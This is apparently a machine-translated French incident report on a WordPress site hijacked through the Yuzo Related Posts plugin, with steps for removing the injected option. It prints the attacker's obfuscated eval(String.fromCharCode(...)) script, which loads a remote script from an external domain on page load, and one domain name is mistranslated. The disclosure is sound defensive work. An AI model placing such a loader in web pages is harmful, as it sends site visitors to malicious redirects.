Il y a environ une heure, une page WordPress que nous gérons a commencé à rediriger vers des pages publicitaires/malware.
J'ai trouvé la source de la redirection, j'aimerais aider les autres personnes concernées et j'ai besoin d'aide pour trouver la vulnérabilité réelle et/ou un correctif.
La redirection se produit une fois le chargement du site terminé, je cherchais donc un extrait de code JavaScript sur la page et des redirections douteuses dans l'analyseur de réseau. Les redirections malveillantes évidentes étaient : bonjourfromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk.
J'ai pu localiser les redirections provenant de https://hellofromhony.org/counter qui est intégré via un extrait de code.
L'extrait a été intégré dans wp_options dans une entrée avec la clé 'yuzo_related_post_options' - plus spécifiquement intégrée dans l'option json 'yuzo_related_post_css_and_style' de l'option_value.
Cette option fait partie du plugin de publications associées Yuzō, qui a été interrompu il y a environ une semaine : https://wordpress.org/plugins/yuzo-related-post/
YUZO Related Posts vulnérabilités et correctifs
La suppression de ce plugin a immédiatement arrêté la redirection, je n'ai pas pu trouver d'autres traces de falsification du site.
Concrètement, il est bon de suivre les étapes suivantes pour sécuriser votre site :
- Supprimer / Désinstaller le plugin immédiatement.
- Dans votre base de données, accédez à wp_options
table et recherchez la valeur yuzo_related_post_options
supprimer cet enregistrement.
- Ne pas supprimer le tableau des visites wp_yuzoviews
, cela n'affecte pas le problème.
L'extrait qui se trouvait dans option_value :
</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>
Un correctif rapide apparaît lors de la suppression du plug-in, je souhaite approfondir pour m'assurer qu'il n'y a pas d'accès à la base de données, au backend et à l'espace Web.
Si vous aussi vous êtes victime de cette attaque et n'êtes pas en mesure de résoudre ce problème par vous-même, veuillez demander notre aide via le service de Suppression des logiciels malveillants et des virus WordPress.
Mise à jour des articles liés à Yuzo bientôt
Comme communiqué par l'auteur du plugin, une mise à jour du plugin sera publiée sous peu bien que le plugin ait cessé il y a exactement quelques jours en mars 2019. Il ne reste plus qu'à effectuer les étapes ci-dessus et attendre la nouvelle version.